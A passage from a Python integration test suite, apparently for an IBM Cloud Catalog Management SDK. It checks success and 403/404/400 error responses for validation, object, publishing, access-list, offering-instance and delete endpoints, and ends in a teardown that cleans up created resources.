install_status = get_preinstall_response.get_result()
assert install_status is not None
####
# Validate Install
####
@needscredentials
def test_validate_install_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.validate_install(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_validate_install_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.validate_install(
version_loc_id='invalid-'+version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_validate_install_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.validate_install(
version_loc_id=bogus_version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_validate_install(self):
assert version_locator_id is not None
# possibly this user doesn't have the right to get the cluster details;
# until this is clarified, the test is skipped
# Error: The specified cluster could not be found. If applicable, make sure that you target
# the correct account and resource group.
validate_install_response = self.catalog_management_service_authorized.validate_install(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
assert validate_install_response.get_status_code() == 202
####
# Get Validation Status
####
@needscredentials
def test_get_validation_status_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_validation_status(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_validation_status_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_validation_status(
version_loc_id='invalid-'+version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_validation_status_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_validation_status(
version_loc_id=bogus_version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_validation_status(self):
assert version_locator_id is not None
get_validation_status_response = self.catalog_management_service_authorized.get_validation_status(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
)
assert get_validation_status_response.get_status_code() == 200
validation = get_validation_status_response.get_result()
assert validation is not None
####
# Get Override Values
####
@needscredentials
def test_get_override_values_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_override_values(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_override_values_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_override_values(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_override_values_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_override_values(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_override_values(self):
# requires a validation run before this operation
assert version_locator_id is not None
get_override_values_response = self.catalog_management_service_authorized.get_override_values(
version_loc_id=version_locator_id,
)
assert get_override_values_response.get_status_code() == 200
result = get_override_values_response.get_result()
assert result is not None
####
# Search Objects
####
@needscredentials
def test_search_objects_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.search_objects(
query='',
collapse=True,
digest=True,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_search_objects_returns_200_when_user_is_not_authorized(self):
search_objects_response = self.catalog_management_service_not_authorized.search_objects(
query='name: '+object_name,
collapse=True,
digest=True,
)
assert search_objects_response.get_status_code() == 200
object_search_result = search_objects_response.get_result()
assert object_search_result is not None
@needscredentials
def test_search_objects(self):
limit = 1
offset = 0
# page through the results until the 'next' link no longer carries an offset
while True:
search_objects_response = self.catalog_management_service_authorized.search_objects(
query='name: object*',
collapse=True,
digest=True,
limit=limit,
offset=offset,
)
assert search_objects_response.get_status_code() == 200
object_search_result = search_objects_response.get_result()
assert object_search_result is not None
# get_result() returns a dict, so the pagination link is read with .get()
offset_value = get_query_param(object_search_result.get('next'), 'offset')
if offset_value is None:
break
offset = int(offset_value)
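# get_query_param (an IBM Cloud SDK core utility) extracts the named query
# parameter from the 'next' pagination link and returns None when no further
# page exists, which is what terminates the loop above.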
####
# List Objects
####
@needscredentials
def test_list_objects_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.list_objects(
catalog_identifier=catalog_id,
name=' ',
sort=' '
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_list_objects_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.list_objects(
catalog_identifier=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_list_objects(self):
assert catalog_id is not None
limit = 1
offset = 0
# page through the catalog's objects until the 'next' link no longer carries an offset
while True:
list_objects_response = self.catalog_management_service_authorized.list_objects(
catalog_identifier=catalog_id,
limit=limit,
offset=offset,
)
assert list_objects_response.get_status_code() == 200
object_list_result = list_objects_response.get_result()
assert object_list_result is not None
offset_value = get_query_param(object_list_result.get('next'), 'offset')
if offset_value is None:
break
offset = int(offset_value)
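# limit=1 yields a single result per page, so the pagination path above is
# exercised on every iteration.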
####
# Replace Object
####
@needscredentials
def test_replace_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.replace_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
id=object_id,
name='updated-object-name-created-by-python-sdk',
parent_id=region_us_south,
kind=kind_vpe,
catalog_id=catalog_id,
data={},
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_replace_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.replace_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
id='invalid-'+object_id,
name='updated-object-name-created-by-python-sdk',
parent_id=region_us_south,
kind=kind_vpe,
catalog_id=catalog_id,
data={},
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_replace_object_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.replace_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
id=object_id,
name='updated object name created by python sdk',
parent_id=region_us_south,
kind=kind_vpe,
catalog_id=catalog_id,
data={},
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_object(self):
# the object name cannot be changed; it is unclear which fields can be updated
assert catalog_id is not None
assert object_id is not None
replace_object_response = self.catalog_management_service_authorized.replace_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
id=object_id,
name='updated-object-name-created-by-python-sdk',
parent_id=region_us_south,
kind=kind_vpe,
catalog_id=catalog_id,
data={},
)
assert replace_object_response.get_status_code() == 200
catalog_object = replace_object_response.get_result()
assert catalog_object is not None
####
# Get Object
####
@needscredentials
def test_get_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.get_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.get_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_object(self):
assert catalog_id is not None
assert object_id is not None
get_object_response = self.catalog_management_service_authorized.get_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert get_object_response.get_status_code() == 200
catalog_object = get_object_response.get_result()
assert catalog_object is not None
####
# Get Object Audit
####
@needscredentials
def test_get_object_audit_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.get_object_audit(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_object_audit_returns_200_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
get_object_audit_response = self.catalog_management_service_authorized.get_object_audit(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
assert get_object_audit_response.get_status_code() == 200
audit_log = get_object_audit_response.get_result()
assert audit_log is not None
@needscredentials
def test_get_object_audit(self):
assert catalog_id is not None
assert object_id is not None
get_object_audit_response = self.catalog_management_service_authorized.get_object_audit(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert get_object_audit_response.get_status_code() == 200
audit_log = get_object_audit_response.get_result()
assert audit_log is not None
####
# Account Publish Object
####
@needscredentials
def test_account_publish_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.account_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_account_publish_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.account_publish_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_account_publish_object(self):
assert catalog_id is not None
assert object_id is not None
account_publish_object_response = self.catalog_management_service_authorized.account_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert account_publish_object_response.get_status_code() == 202
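# The publish endpoints widen an object's visibility in stages: account, then
# shared, then IBM, then public. The later stages below are skipped because
# this object has not been approved for publication beyond the account scope.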
####
# Shared Publish Object
####
@needscredentials
def test_shared_publish_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.shared_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_shared_publish_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.shared_publish_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_shared_publish_object(self):
assert catalog_id is not None
assert object_id is not None
# Error: An invalid catalog object was provided
shared_publish_object_response = self.catalog_management_service_authorized.shared_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert shared_publish_object_response.get_status_code() == 202
####
# IBM Publish Object
####
@needscredentials
def test_ibm_publish_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.ibm_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_ibm_publish_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.ibm_publish_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_ibm_publish_object(self):
assert catalog_id is not None
assert object_id is not None
# Error: Object not approved to request publishing to IBM for
ibm_publish_object_response = self.catalog_management_service_authorized.ibm_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert ibm_publish_object_response.get_status_code() == 202
####
# Public Publish Object
####
@needscredentials
def test_public_publish_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.public_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_public_publish_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.public_publish_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_public_publish_object(self):
assert catalog_id is not None
assert object_id is not None
# Error: Object not approved to request publishing to IBM for
public_publish_object_response = self.catalog_management_service_authorized.public_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert public_publish_object_response.get_status_code() == 202
####
# Create Object Access
####
@needscredentials
def test_create_object_access_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.create_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_create_object_access_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.create_object_access(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_create_object_access(self):
assert catalog_id is not None
assert object_id is not None
create_object_access_response = self.catalog_management_service_authorized.create_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
assert create_object_access_response.get_status_code() == 201
####
# Get Object Access List
####
@needscredentials
def test_get_object_access_list_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.get_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_object_access_list_returns_200_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
get_object_access_list_response = self.catalog_management_service_authorized.get_object_access_list(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
assert get_object_access_list_response.get_status_code() == 200
object_access_list_result = get_object_access_list_response.get_result()
assert object_access_list_result is not None
# pager
@needscredentials
def test_get_object_access_list(self):
assert catalog_id is not None
assert object_id is not None
get_object_access_list_response = self.catalog_management_service_authorized.get_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert get_object_access_list_response.get_status_code() == 200
object_access_list_result = get_object_access_list_response.get_result()
assert object_access_list_result is not None
####
# Get Object Access
####
@needscredentials
def test_get_object_access_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.get_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_object_access_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.get_object_access(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_object_access(self):
assert catalog_id is not None
assert object_id is not None
# Error: Error loading version with id: 6e263640-4805-471d-a30c-d7667325581c.
# e59ad442-d113-49e4-bcd4-5431990135fd: Error[404 Not Found]
get_object_access_response = self.catalog_management_service_authorized.get_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
assert get_object_access_response.get_status_code() == 200
object_access = get_object_access_response.get_result()
assert object_access is not None
####
# Add Object Access List
####
@needscredentials
def test_add_object_access_list_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.add_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
accounts=[self.account_id],
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_add_object_access_list_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.add_object_access_list(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
accounts=[self.account_id],
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_add_object_access_list(self):
assert catalog_id is not None
assert object_id is not None
add_object_access_list_response = self.catalog_management_service_authorized.add_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
accounts=[self.account_id],
)
assert add_object_access_list_response.get_status_code() == 201
access_list_bulk_response = add_object_access_list_response.get_result()
assert access_list_bulk_response is not None
####
# Create Offering Instance
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_create_offering_instance_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
assert offering_id is not None
# don't know what kind_format is needed here, vpe, helm and offering don't work
try:
self.catalog_management_service_authorized.create_offering_instance(
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_id,
catalog_id='invalid-'+catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.2',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_create_offering_instance_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
# don't know what kind_format is needed here, vpe, helm and offering don't work
try:
self.catalog_management_service_not_authorized.create_offering_instance(
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.2',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_create_offering_instance_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.create_offering_instance(
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format='bogus kind',
version='0.0.2',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_create_offering_instance(self):
global offering_instance_id
assert catalog_id is not None
assert offering_id is not None
create_offering_instance_response = self.catalog_management_service_authorized.create_offering_instance(
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.2',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
assert create_offering_instance_response.get_status_code() == 201
offering_instance_id = create_offering_instance_response.get_result()
assert offering_instance_id is not None
assert offering_instance_id['id'] is not None
offering_instance_id = offering_instance_id['id']
####
# Get Offering Instance
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_instance_returns_403_when_user_is_not_authorized(self):
assert offering_instance_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_instance(
instance_identifier=offering_instance_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_instance_returns_404_when_no_such_offering_instance(self):
assert offering_instance_id is not None
try:
self.catalog_management_service_authorized.get_offering_instance(
instance_identifier='invalid-'+offering_instance_id
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_instance(self):
assert offering_instance_id is not None
get_offering_instance_response = self.catalog_management_service_authorized.get_offering_instance(
instance_identifier=offering_instance_id,
)
assert get_offering_instance_response.get_status_code() == 200
offering_instance = get_offering_instance_response.get_result()
assert offering_instance is not None
####
# Put Offering Instance
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_put_offering_instance_returns_403_when_user_is_not_authorized(self):
assert offering_instance_id is not None
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.put_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_instance_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.3',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_put_offering_instance_returns_404_when_no_such_catalog(self):
assert offering_instance_id is not None
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.put_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_instance_id,
catalog_id='invalid-'+catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.3',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_put_offering_instance_returns_400_when_backend_input_validation_fails(self):
assert offering_instance_id is not None
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.put_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_instance_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format='bogus kind',
version='0.0.3',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_put_offering_instance(self):
assert offering_instance_id is not None
assert catalog_id is not None
assert offering_id is not None
put_offering_instance_response = self.catalog_management_service_authorized.put_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_instance_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.3',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
assert put_offering_instance_response.get_status_code() == 200
offering_instance = put_offering_instance_response.get_result()
assert offering_instance is not None
####
# Delete Version
####
@needscredentials
def test_delete_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.delete_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_delete_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.delete_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_delete_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.delete_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_version(self):
assert version_locator_id is not None
delete_version_response = self.catalog_management_service_authorized.delete_version(
version_loc_id=version_locator_id,
)
assert delete_version_response.get_status_code() == 200
####
# Delete Operators
####
@needscredentials
def test_delete_operators_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.delete_operators(
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_operators_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.delete_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_delete_operators_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.delete_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_delete_operators(self):
assert version_locator_id is not None
# Error: Error loading version with id: fdeefb18-57aa-4390-a9e0-b66b551db803.
# 2c187aa6-5009-4a2f-8f57-86533d2d3a18: Error[404 Not Found] -
# Version not found: Catalog[fdeefb18-57aa-4390-a9e0-b66b551db803]:Version[2c187aa6-5009-4a2f-8f57-86533d2d3a18]
delete_operators_response = self.catalog_management_service_authorized.delete_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
assert delete_operators_response.get_status_code() == 200
####
# Delete Offering Instance
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_delete_offering_instance_returns_403_when_user_is_not_authorized(self):
assert offering_instance_id is not None
try:
self.catalog_management_service_not_authorized.delete_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_delete_offering_instance_returns_404_when_no_such_offering_instance(self):
assert offering_instance_id is not None
try:
self.catalog_management_service_authorized.delete_offering_instance(
instance_identifier='invalid-'+offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_delete_offering_instance(self):
assert offering_instance_id is not None
delete_offering_instance_response = self.catalog_management_service_authorized.delete_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
)
assert delete_offering_instance_response.get_status_code() == 200
####
# Delete Object Access List
####
@needscredentials
def test_delete_object_access_list_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.delete_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
accounts=[self.account_id],
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_object_access_list_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.delete_object_access_list(
catalog_identifier='invalid-'+catalog_id,
object_identifier=object_id,
accounts=[self.account_id],
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_delete_object_access_list(self):
assert catalog_id is not None
assert object_id is not None
delete_object_access_list_response = self.catalog_management_service_authorized.delete_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
accounts=[self.account_id],
)
assert delete_object_access_list_response.get_status_code() == 200
access_list_bulk_response = delete_object_access_list_response.get_result()
assert access_list_bulk_response is not None
####
# Delete Object Access
####
@needscredentials
def test_delete_object_access_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.delete_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_object_access_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.delete_object_access(
catalog_identifier='invalid-'+catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_delete_object_access(self):
assert catalog_id is not None
assert object_id is not None
delete_object_access_response = self.catalog_management_service_authorized.delete_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
assert delete_object_access_response.get_status_code() == 200
####
# Delete Object
####
@needscredentials
def test_delete_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.delete_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_object_returns_200_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
delete_object_response = self.catalog_management_service_authorized.delete_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
assert delete_object_response.get_status_code() == 200
@needscredentials
def test_delete_object(self):
assert catalog_id is not None
assert object_id is not None
for created_object_id in created_object_ids:
delete_object_response = self.catalog_management_service_authorized.delete_object(
catalog_identifier=catalog_id,
object_identifier=created_object_id,
)
assert delete_object_response.get_status_code() == 200
####
# Delete Offering
####
@needscredentials
def test_delete_offering_returns_200_when_no_such_offering(self):
assert catalog_id is not None
assert offering_id is not None
delete_offering_response = self.catalog_management_service_authorized.delete_offering(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
)
assert delete_offering_response.get_status_code() == 200
@needscredentials
def test_delete_offering_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.delete_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_offering(self):
assert catalog_id is not None
assert offering_id is not None
for i in created_offering_ids:
delete_offering_response = self.catalog_management_service_authorized.delete_offering(
catalog_identifier=catalog_id,
offering_id=i,
)
assert delete_offering_response.get_status_code() == 200
####
# Delete Catalog
####
@needscredentials
def test_delete_catalog_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.delete_catalog(
catalog_identifier='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_delete_catalog_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.delete_catalog(
catalog_identifier=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_catalog(self):
assert catalog_id is not None
delete_catalog_response = self.catalog_management_service_authorized.delete_catalog(
catalog_identifier=catalog_id,
)
assert delete_catalog_response.get_status_code() == 200
@classmethod
def teardown_class(cls):
try:
cls.catalog_management_service_authorized.delete_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException:
print("Object is already deleted.")
try:
cls.catalog_management_service_authorized.delete_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
except ApiException:
print("Offering is already deleted.")
try:
